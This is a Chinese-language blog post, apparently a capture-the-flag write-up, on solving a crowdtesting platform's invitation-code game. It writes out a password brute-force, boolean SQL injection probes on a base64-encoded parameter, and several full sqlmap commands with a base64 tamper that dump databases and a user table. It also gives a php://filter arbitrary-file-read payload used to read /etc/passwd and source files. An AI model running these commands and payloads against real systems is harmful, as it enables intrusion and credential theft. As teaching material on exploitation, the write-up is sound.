前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记录一次众测平台邀请码获取

记录一次众测平台邀请码获取

作者头像
Power7089
发布2021-02-12 15:56:44
1.5K0
发布2021-02-12 15:56:44
举报
文章被收录于专栏:闪石星曜CyberSecurity

0x00 背景

今天刚到公司,看到刚哥在群里发的消息。

打开一看是个众测平台,注册的时候提示需要邀请码,而邀请码的获得方式有两种,一种是老用户邀请,另一种则需要通过平台提供的一个小游戏获取flag,然而我们也不认识老用户,没办法那只能去找flag了。

游戏地址

0x01 密码爆破

打开网址看到只有一个用户名密码,并没有存在验证码,那肯定是先使用burp软件密码爆破一波。

密码非常简单,根据返回的状态码找到正确的账号密码test/test123。

0x02 sql注入(整形手动)

使用破解的账号密码登录系统,只有两个链接地址,分别打开看看,其中一个链接地址中包含aid参数,对其进行了一波简单的sql注入尝试后,并没有发现什么可用的价值,暂时先放着。

接下来尝试把aid=1换成-1、0、1、2、3、4看看页面变化,当aid=3时页面出现了更多链接,如下图:

然后将这些链接挨个打开,当打开第4个链接(http://119.3.191.245:8877/user/Article.php?aid=3&id=NQ==)时,发现与其它链接有点不一样,多了一个参数,将NQ==尝试用bases64解密后是5,然后对该参数进行sql注入尝试。将5 and 1=1进行base64加密后替换至url中观察页面返回结果,如下图:

然后将5 and 1=2进行base64加密后替换至url中观察页面返回结果,结果发现端倪,如下图:

到这里可以基本判断此处存在sql注入漏洞,然后利用order by(或者union select 1,2,3,4,5,6,N)确定当前数据库的字段数目,为接下来爆库表字段做准备。

将order by n(n是猜测的字段数目)加密后放到地址栏最后,经过多次尝试最后的字段数为order by 3。

已知字段数为3,那么就可以利用union联合查询判断网站显示的内容在数据库的第几列。当使用5 union select 1,2,3 —+加密添加到id=之后,结果网页显示“感知到注入迹象,启动第四阻断机制”的提示,猜测可能是因为网站禁止使用union函数。

0x03 sql注入(盲注)

既然union不让用,那就试试盲注,因为手动盲注太费时间,我选择使用sqlmap工具,构造命令

代码语言:javascript
复制
python sqlmap.py -u "http://119.3.191.245:8877/user/Article.php?aid=3&id=*" --cookie=" PHPSESSID=oteibuuop3nr3oj8d7e899ulg1" --batch --random-agent --tamper base64encode.py --level 3

(*是指定跑注入的位置,—cookie=“使用burp抓包得到自己的cookie” , —batch默认选择确定,—random-agent选项将sqlmap的标准值更改为任意值,利用工具base64encode.py解码 ,—level 3同时显示注入的payload。)

注入成功,接下来跑网站的数据库

代码语言:javascript
复制
python sqlmap -u "http://119.3.191.245:8877/user/Article.php?aid=3&id=*" --cookie="PHPSESSID=oteibuuop3nr3oj8d7e899ulg1" --batch --random-agent --tamper base64encode.py --dbs

最后跑出来五个数据库,除了level2其余4个均为mysql的自带库,然后选择level2数据库跑数据表,构造命令如下:

代码语言:javascript
复制
python sqlmap.py -u "http://119.3.191.245:8877/user/Article.php?aid=3&id=*" --cookie="PHPSESSID=oteibuuop3nr3oj8d7e899ulg1" --batch --random-agent --tamper base64encode.py -D "level2" --tables

level2库中存在user和article两个表,那基本可以判断user表是保存登录账号密码的表,article是刚才那个页面像小说页面的文章表,如下图:

查看user表中内容,构造命令如下:

代码语言:javascript
复制
python sqlmap.py -u "http://119.3.191.245:8877/user/Article.php?aid=3&id=*" --cookie="PHPSESSID=oteibuuop3nr3oj8d7e899ulg1" --batch --random-agent --tamper base64encode.py -D "level2" -T "user" --dump

成功得到所有账户名密码,看到其中有admin账户,登录后看看是否有flag线索。

0x04 sql文件包含

登录admin账号后页面几乎与test页面无两样,不过在同样的文本后多了一个小表情,应该是某种线索,点击右键查看源代码,发现图片地址,如下图:

看到图片url中的filename参数,第一感觉是尝试文件包含,首先读取filename=/etc/passwd成功读取,可以很确定此处存在任意文件读取漏洞。

任意文件读取漏洞好像对于拿flag没有什么用,不过我们可以尝试读取当前这些页面的源文件,看看有没有什么线索。poc构造如下:

代码语言:javascript
复制
filename=php://filter/read=convert.base64-encode/resource=Read.php

将Read.php文件的内容以base64形式输出,将得到的内容解密,可以看到Read.php的源码如下图:

看到文件包含函数requlre_once引用了Base.php文件,继续尝试读取Base.php文件,如下图:

将解密的代码拉到最后看到“关于邀请码”的提示,继续读取meifahufujiulaimingdu.php源码,源码文件内容如下:

代码语言:javascript
复制
<?php

 #关于邀请码,嗯,一目了然。

require_once("Base.php");

error_reporting(0);

//$user = isUser();

 $url = "http://172.17.0.1:3000/code";

 $email = "";

function send_post( $url , $post_data ) {

    $postdata = http_build_query( $post_data );

    $options = array (

        'http' => array (

            'method' => 'POST' ,

            'header' => 'Content-type:application/x-www-form-urlencoded' ,

            'content' => $postdata ,

            'timeout' => 15 * 60
        )
    );
    $context = stream_context_create( $options );

    $result = file_get_contents ( $url , false, $context );
    return $result ;
}

$post_data = array (
    'e' => $_POST['email']
);

echo send_post( $url , $post_data );

#ps:建团?什么建团?啊,哦,那个啊,我记得小姐把它扔到static下面去了,有心的话,去那儿找找吧。

根据得到的信息了解到需要用post方式提交email=参数获取邀请码,构造接口如下图:

成功返回flag,提交flag注册成功。

代码语言:javascript
复制
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-01-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 程序员阿甘 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 背景
  • 0x01 密码爆破
  • 0x02 sql注入(整形手动)
  • 0x03 sql注入(盲注)
  • 0x04 sql文件包含
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档